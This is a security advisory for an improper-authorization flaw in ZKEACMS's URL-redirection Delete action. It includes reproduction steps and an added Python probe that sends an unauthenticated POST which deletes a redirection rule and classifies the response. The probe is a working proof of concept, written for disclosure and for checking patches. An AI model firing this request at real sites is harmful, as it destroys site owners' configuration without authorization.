SeriaWei ZKEACMS Improper Authorization Vulnerability in Url Redirection Controller
Vulnerability
A vulnerability exists in SeriaWei ZKEACMS versions through 4.3 in the Delete action of UrlRedirectionController. The action performs no authorization check, so a request that carries no session and no specific permission can delete URL redirection rules. Once a rule is gone, requests to the old URL are no longer redirected and return 404 errors, which degrades user experience and SEO.
Impact
Exploitation allows unauthenticated deletion of URL redirection rules, so the impact is to the integrity and availability of the site's redirection configuration rather than to confidentiality. Pages that relied on a deleted rule start returning 404 errors, which harms user experience and search engine ranking.
Reproduction
To reproduce this vulnerability, send a POST request to the /admin/UrlRedirection/Delete/{id} endpoint, replacing {id} with the identifier of an existing redirection rule. No login session or specific permission is required. The request deletes the redirection rule with that ID. Because the request is destructive, run it only against a test instance or a throwaway rule.
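The probe below is an added example, not part of the original advisory or of the ZKEACMS project. It sends the unauthenticated POST described above and classifies the response. The classification rules are assumptions about typical ASP.NET Core behaviour (401/403, or a 302 to a login page, means the action was protected; a 2xx means the action ran without authentication); the host, port and rule id are placeholders supplied on the command line.

```python
"""Probe whether the UrlRedirection Delete action accepts an unauthenticated POST.

Added example for this advisory; not code from ZKEACMS. Destructive: the
target rule is deleted if the endpoint is vulnerable, so point it at a test
instance or a throwaway rule only.
"""
import sys
import urllib.error
import urllib.request

REDIRECT_CODES = (301, 302, 303, 307, 308)


def build_url(base_url, rule_id):
    """Build the Delete endpoint URL named in the advisory (no auth header, no cookie)."""
    return f"{base_url.rstrip('/')}/admin/UrlRedirection/Delete/{rule_id}"


def classify(status, location=None):
    """Map an HTTP status (plus optional Location header) to a verdict.

    Assumptions (not stated by the advisory): 401/403 or a redirect to a page
    whose path contains 'login' means the action enforced authorization;
    any 2xx means the action executed for an anonymous caller.  Everything
    else (400 from an antiforgery check, 404, 500, other redirects) needs a
    manual look at the response body and the rule list.
    """
    if status in (401, 403):
        return "blocked"
    if status in REDIRECT_CODES and location and "login" in location.lower():
        return "blocked"
    if 200 <= status < 300:
        return "reached-without-auth"
    return "inconclusive"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so a login bounce is visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, rule_id, timeout=10):
    """POST to the Delete action with no credentials and classify the outcome."""
    req = urllib.request.Request(build_url(base_url, rule_id), data=b"", method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return classify(resp.status, resp.headers.get("Location"))
    except urllib.error.HTTPError as err:  # raised for 3xx (not followed), 4xx, 5xx
        return classify(err.code, err.headers.get("Location"))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: probe.py <base_url> <rule_id>   e.g. http://cms.test:5000 17")
    print(probe(sys.argv[1], sys.argv[2]))
```

A verdict of reached-without-auth should be confirmed by checking that the rule has disappeared from the redirection list in the admin UI; blocked indicates a patched or otherwise protected build.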
